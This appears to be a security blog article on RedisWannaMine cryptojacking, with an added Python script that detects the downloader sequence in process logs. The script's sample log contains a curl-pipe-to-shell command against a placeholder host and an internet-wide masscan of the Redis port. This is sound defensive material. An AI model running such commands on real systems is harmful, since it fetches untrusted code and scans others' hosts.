Cyber criminals increasingly turn to "cryptojacking"


A new research report has found that cyber criminals are increasingly using advanced evasion techniques to enable “cryptojacking”: hijacking a victim’s computing resources to mine cryptocurrency.

Also known as “illicit cryptocurrency mining”, the activity has become popular among criminal hackers as an easy way to fund their other operations, as the prices of currencies such as Bitcoin continue to swell. Miners commit computing hardware to validating batches of transactions carried out by other users on the blockchain, in return for a chance to be rewarded with newly issued coins.

According to researchers at security firm Imperva, new cryptojacking techniques usually involve malware that installs legitimate cryptocurrency mining software on targeted systems, typically modified so that the mined coins are sent to wallets controlled by the criminals.

One new variant uncovered by the researchers is considerably more complex than its forebears, both in its capabilities and in the techniques it uses to avoid detection, which Imperva describes as heralding a “new generation of cryptojacking attacks”.

These attacks are aimed at both database servers and application servers, the researchers continued. They dubbed the new technique RedisWannaMine because it targets servers running the open source Redis in-memory data store and bears some similarity to the recent WannaCry attacks, which spread through a vulnerable server message block (SMB) service.

“In a nutshell, cryptojacking attackers have upped their game and they are getting crazier by the minute,” the researchers wrote in a blog post.

They tracked down RedisWannaMine after a remote code execution (RCE) attempt was detected by Imperva’s web application sensors.

What they discovered at first looked like an innocuous downloader, indistinguishable from earlier cryptojacking attacks in which the attacker gains remote access through a persistent chain of attacks.

On closer inspection, the downloader behaved differently: a script installed a series of packages via the standard Linux package managers, so it did not depend on any other files already present on the victim’s machine. The script then downloaded and installed masscan, a publicly available TCP port scanner.

Using masscan, the script then searched for other hosts with a specific port listening so that, where possible, it could infect them with the same cryptominer malware, evading along the way several security measures that would otherwise have rendered it inoperable.
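The sequence described above (package installs, fetch and build of masscan, then a scan for further victims) is also a usable detection rule. The following Python script is an added illustration, not Imperva’s code or anything from the attackers’ script: it groups process-execution events by their lineage and alerts when a scanner run appears alongside the other stages under the same ancestor process. The log format, the hostnames (reserved .invalid TLD) and the choice of Redis’s default port 6379 as the scanned port are assumptions for the example.

```python
"""Detect a RedisWannaMine-style downloader sequence in process logs.

Added example: not Imperva's code or the attackers' script. It applies
the behaviour described in the article (package installs, fetch and build
of masscan, then a port scan for further victims) as a detection rule over
process-execution events grouped by lineage.

Assumptions (not from the article): the log format below, and that the
scanned port is Redis's default 6379.
"""
import re
from collections import defaultdict

# Assumed log format: "<timestamp> <pid> <ppid> <user> <command line>".
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$"
)

# Each stage of the downloader's behaviour as a pattern on the command line.
STAGES = {
    "pkg_install": re.compile(r"\b(apt-get|apt|yum|dnf|apk)\s+(install|add)\b"),
    "fetch_scanner": re.compile(r"\b(curl|wget|git\s+clone)\b.*masscan"),
    "build_scanner": re.compile(r"\bmake\b.*\bmasscan\b"),
    "run_scanner": re.compile(r"\bmasscan\b.*\s(-p\s*\d+|--ports?\s*\d+)"),
}
INTERNET_WIDE = re.compile(r"\b0\.0\.0\.0/0\b")

# Constructed sample log (assumed format; .invalid hosts are never contacted).
SAMPLE_LOG = """\
2018-03-01T10:00:01Z 4120 4100 www-data /bin/sh -c curl -s http://dl.example.invalid/x.sh | sh
2018-03-01T10:00:02Z 4121 4120 www-data apt-get install -y git python gcc make libpcap-dev
2018-03-01T10:00:40Z 4125 4120 www-data yum install -y git python gcc make libpcap-devel
2018-03-01T10:00:45Z 4130 4120 www-data git clone https://git.example.invalid/masscan.git
2018-03-01T10:01:30Z 4140 4120 www-data make -C masscan
2018-03-01T10:01:35Z 4141 4120 www-data masscan 0.0.0.0/0 -p6379 --rate 50000 -oL scan.txt
2018-03-01T10:02:00Z 5000 1 root /usr/sbin/cron -f
2018-03-01T10:02:10Z 5001 5000 root apt-get install -y unattended-upgrades
"""


def parse_log(text):
    """Parse log lines into event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["pid"], e["ppid"] = int(e["pid"]), int(e["ppid"])
        events.append(e)
    return events


def classify(cmd):
    """Return the set of downloader stages a command line matches."""
    return {name for name, rx in STAGES.items() if rx.search(cmd)}


def lineage_root(pid, parent_of):
    """Walk up the parent chain while the parent is itself a logged process."""
    seen = set()
    while pid not in seen and parent_of.get(pid) in parent_of:
        seen.add(pid)
        pid = parent_of[pid]
    return pid


def detect(text, min_stages=2):
    """Group stage hits by process lineage and alert when a scanner run
    appears together with at least one other stage under the same root."""
    events = parse_log(text)
    parent_of = {e["pid"]: e["ppid"] for e in events}
    user_of = {e["pid"]: e["user"] for e in events}
    hits = defaultdict(lambda: {"stages": set(), "pids": set(), "wide": False})
    for e in events:
        stages = classify(e["cmd"])
        if not stages:
            continue
        h = hits[lineage_root(e["pid"], parent_of)]
        h["stages"] |= stages
        h["pids"].add(e["pid"])
        if "run_scanner" in stages and INTERNET_WIDE.search(e["cmd"]):
            h["wide"] = True  # scanning the whole IPv4 space, as a worm would
    alerts = []
    for root, h in sorted(hits.items(), key=lambda kv: kv[0]):
        if "run_scanner" in h["stages"] and len(h["stages"]) >= min_stages:
            alerts.append({
                "root_pid": root,
                "user": user_of.get(root),
                "stages": sorted(h["stages"]),
                "pids": sorted(h["pids"]),
                "internet_wide_scan": h["wide"],
            })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"ALERT root pid {a['root_pid']} ({a['user']}): "
              f"stages={a['stages']} internet_wide={a['internet_wide_scan']}")
```

Grouping by lineage is what separates the worm from legitimate administration: the cron-driven `apt-get install` in the sample matches a stage on its own but never alerts, while the web-server user’s shell that installs build tools, fetches masscan and then scans the Internet for one port does.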

Imperva’s researchers advise businesses to protect their web applications and databases with a specialist web application firewall, and to make sure their machines are not running a vulnerable version of server message block (SMB) software.

About Lee Hazell

Lee Hazell is a cyber security consultant with a keen interest in anything tech or security related.
